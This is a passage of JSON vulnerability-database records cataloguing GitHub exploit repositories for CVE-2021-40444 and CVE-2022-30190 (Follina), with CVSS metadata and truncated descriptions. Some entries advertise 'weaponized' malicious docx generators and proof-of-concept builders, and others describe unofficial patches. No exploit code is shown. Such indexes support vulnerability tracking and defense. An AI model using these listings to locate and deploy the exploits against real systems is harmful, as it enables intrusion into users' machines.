"obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40444"], "modified": "2021-10-14T23:45:35", "id": "0990FE6E-7DC3-559E-9B84-E739872B988C", "href": "", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2023-06-05T05:19:33", "description": "# CVE-2021-40444 PoC\n\nMalicious docx generator to exploit CVE-20...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2023-06-05T02:27:21", "type": "githubexploit", "title": "Exploit for Path Traversal in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40444"], "modified": "2023-06-05T02:29:52", "id": "1934A15D-9857-5560-B6CA-EA6A2A8A91F8", "href": "", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2023-05-23T17:34:32", "description": "# Fully Weaponized CVE-2021-40444\n\nMalicious docx generator to e...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-12-28T06:33:25", "type": "githubexploit", "title": "Exploit for Path Traversal in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40444"], "modified": "2021-12-28T09:38:18", "id": "CCA69DF0-1EB2-5F30-BEC9-04ED43F42EA5", "href": "", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-01-09T21:51:56", "description": "# Microsoft MSHTML Remote Code Execution Vulnerability CVE-2021-...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-09-08T08:32:40", "type": "githubexploit", "title": "Exploit for Vulnerability in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40444"], "modified": "2022-01-09T21:16:38", "id": "FBB2DA29-1A11-5D78-A28C-1BF3821613AC", "href": "", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2023-08-12T00:16:33", "description": "# Follina-CVE-2022-30190-Sample-by-ethical-blue\n Educational Fol...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-06-25T16:27:59", "type": "githubexploit", "title": "Exploit for Externally Controlled Reference to a Resource in Another Sphere in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-30190"], "modified": "2023-07-01T22:51:35", "id": "FB757D3A-A896-5AB5-B72B-7C880581D12E", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2023-09-17T01:39:26", "description": "# Follina-CVE-2022-30190-Unofficial-patch-\nAn Unofficial Patch F...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-06-13T04:20:02", "type": "githubexploit", "title": "Exploit for Externally Controlled Reference to a Resource in Another Sphere in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-30190"], "modified": "2023-09-16T21:54:22", "id": "56417A88-33CB-520F-8FC3-4F3E49561DDC", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2023-09-17T01:37:06", "description": "# CVE-2022-30190_EXP_PowerPoint\n\nThis is exploit of CVE-2022-301...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-06-29T08:48:12", "type": "githubexploit", "title": "Exploit for Externally Controlled Reference to a Resource in Another Sphere in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-30190"], "modified": "2023-09-16T21:54:49", "id": "705BFDF7-98C8-5300-AB18-E9EEE465AE5F", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-10-23T20:04:43", "description": "# CVE-2022-30190\n**S...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-10-23T15:24:43", "type": "githubexploit", "title": "Exploit for Vulnerability in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-30190"], "modified": "2022-10-23T15:34:15", "id": "E917FE93-F06C-5F70-915F-A5F48A30B044", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2023-08-12T00:36:33", "description": "<h1 align='center'><b> Follina-attack-CVE-2022-30190-</b></h1><b...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-10-06T11:41:43", "type": "githubexploit", "title": "Exploit for Externally Controlled Reference to a Resource in Another Sphere in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-30190"], "modified": "2022-10-06T15:42:31", "id": "E7177DCC-97D5-5A91-8A06-124DD3CB9739", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2023-08-12T01:11:20", "description": "# Follina Proof of Concept (CVE-2022-30190)\n\nQuick and easy \"pro...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-05-31T10:47:57", "type": "githubexploit", "title": "Exploit for Externally Controlled Reference to a Resource in Another Sphere in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-30190"], "modified": "2023-07-17T17:01:27", "id": "02FCE52D-5E91-5C57-A40A-DE4FF7C726A3", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2023-08-12T01:07:04", "description": "# follina (POC)\nAll about CVE-2022-30190, aka follina, that is a...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-06-03T00:25:37", "type": "githubexploit", "title": "Exploit for Externally Controlled Reference to a Resource in Another Sphere in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-30190"], "modified": "2023-08-04T05:23:21", "id": "221070D3-0B31-5CF7-A508-B4740B63647B", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2023-08-12T00:57:47", "description": "# FollinaExtractor\nExtract ...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-06-15T02:22:53", "type": "githubexploit", "title": "Exploit for Externally Controlled Reference to a Resource in Another Sphere in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-30190"], "modified": "2023-04-08T01:53:55", "id": "675E960A-9F2E-5575-8C21-8528492BE5C6", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-07-13T19:05:20", "description": "# CVE-2021-40444\nCVE-2021-40444 POC\n\n-----BEGIN PUBLIC KEY-----\n...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-09-09T02:30:26", "type": "githubexploit", "title": "Exploit for Path Traversal in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40444"], "modified": "2021-09-17T10:41:29", "id": "37D2BE4F-9D7A-51CD-B802-2FAB35B39A4E", "href": "", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-08-17T22:52:51", "description": "# CVE-2021-40444--CABless version\nUpdate: Modified code so that ...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-09-19T19:46:28", "type": "githubexploit", "title": "Exploit for Path Traversal in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40444"], "modified": "2022-07-17T22:25:33", "id": "0E388E09-F00E-58B6-BEFE-026913357CE0", "href": "", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2023-09-17T02:36:47", "description": "CVE-2021-40444 builders\n\nThis repo contain builders of cab file,...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-09-12T18:05:53", "type": "githubexploit", "title": "Exploit for Path Traversal in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40444"], "modified": "2023-09-16T21:47:26", "id": "8CD90173-6341-5FAD-942A-A9617561026A", "href": "", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2021-12-24T12:46:04", "description": "# CVE-2021-40444 docx Generate\n.docx generate...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-09-11T02:49:37", "type": "githubexploit", "title": "Exploit for Vulnerability in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40444"], "modified": "2021-12-24T11:57:05", "id": "88EFCA30-5DED-59FB-A476-A92F53D1497E", "href": "", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-07-13T19:05:39", "description": "\"Fork\" of [lockedbytes](https://github.com/lockedbyte) CVE-2021-...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-09-14T13:45:36", "type": "githubexploit", "title": "Exploit for Path Traversal in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40444"], "modified": "2021-12-15T14:42:59", "id": "F5CEF191-B04C-5FC5-82D1-3B728EC648A9", "href": "", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2023-08-22T21:43:08", "description": "# CVE 30190\n\n> Amine TITROFINE | December 17, 2022\n\n------------...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2023-05-14T13:38:43", "type": "githubexploit", "title": "Exploit for Externally Controlled Reference to a Resource in Another Sphere in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-30190"], "modified": "2023-07-26T14:55:34", "id": "3CCF78E3-E22A-54A3-907C-1D687E20BE7C", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2023-08-11T23:41:37", "description": "# CVE-2022-30190\n\n> Based on https://github.com/JohnHammond/msdt...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2023-05-02T07:56:28", "type": "githubexploit", "title": "Exploit for Externally Controlled Reference to a Resource in Another Sphere in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-30190"], "modified": "2023-07-26T14:55:29", "id": "CEC4033D-26C5-5A07-8D86-31A7AF928BDB", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2023-08-12T00:59:41", "description": "# **_\ud83e\ude79CVE-2022-30190 Temporary Fix\ud83e\ude79 (Source Code)_**\nThese are t...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-06-12T11:48:22", "type": "githubexploit", "title": "Exploit for Externally Controlled Reference to a Resource in Another Sphere in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-30190"], "modified": "2022-06-15T10:20:20", "id": "4881AA63-B127-594A-8F5B-ED68FD4BB9FF", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2023-08-30T07:31:59", "description": "# CVE-2022-30190 (Follina)\n\n[![build.yml](https://github.com/win...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": 